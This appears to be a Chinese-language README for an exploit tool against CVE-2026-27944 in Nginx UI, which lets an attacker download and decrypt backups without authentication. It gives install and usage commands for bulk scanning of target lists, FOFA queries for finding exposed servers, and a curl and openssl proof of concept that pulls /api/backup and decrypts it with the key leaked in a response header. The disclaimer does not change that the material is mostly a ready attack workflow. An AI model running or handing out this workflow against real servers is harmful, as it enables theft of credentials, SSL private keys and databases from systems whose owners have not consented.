随便啦
🚀 CVE-2026-27944:Nginx UI 未授权备份漏洞利用工具
📌 描述
27944.py 是针对 CVE-2026-27944 的漏洞利用工具,允许攻击者在无需认证的情况下下载并解密 Nginx UI 的备份。
此漏洞存在于 Nginx UI 版本 < 2.3.2 中,可导致以下数据泄露:
· 用户凭据和会话令牌
· SSL 私钥
· Nginx 配置
· 数据库文件
🔧 功能
· ✅ 从目标文件中进行批量扫描
· ✅ 单个目标漏洞利用
· ✅ 自动下载备份
· ✅ 自动解密 AES-256-CBC
· ✅ 自动从备份中提取凭据
🛠️ 安装方法
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt
🚀 使用方法
python 27944.py -f targets.txt -o hasil_scan
python 27944.py -t target.com:9000 --exploit --decrypt
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full
📋 目标文件格式
target1.com:9000
192.168.1.1:9000
target2.com:8080
🎯 FOFA 搜索语法
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"
📂 输出结果
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
├── app.ini
├── database.db
├── nginx.conf
└── ssl/
⚠️ 免责声明
本工具仅供教育和道德安全测试使用。作者不对该工具的任何滥用行为负责。请仅在您拥有或获得明确书面授权测试的系统上使用。
📝 技术说明
CVE-2026-27944 是 Nginx UI 中的一个严重漏洞,允许攻击者在无需认证的情况下访问 /api/backup 端点。备份中包含使用 AES-256 加密的敏感数据,但密钥和 IV 通过 Base64 格式的 X-Backup-Security 头发送。
CVSS 评分:9.8(严重)
受影响版本:Nginx UI < 2.3.2
缓解措施:
💡 POC(概念验证)
# 检查漏洞是否存在
curl -I http://target:9000/api/backup
# 下载备份
curl -s http://target:9000/api/backup -o backup.bin
# 手动解密备份
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip